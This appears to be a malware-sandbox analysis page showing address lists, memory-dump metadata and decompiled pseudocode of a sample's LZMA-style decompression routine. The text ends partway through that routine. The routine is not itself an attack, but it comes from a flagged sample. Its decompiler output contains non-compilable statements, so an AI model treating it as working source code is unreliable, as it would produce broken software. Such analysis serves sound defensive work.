0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb
0x00000000
0x00407002

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
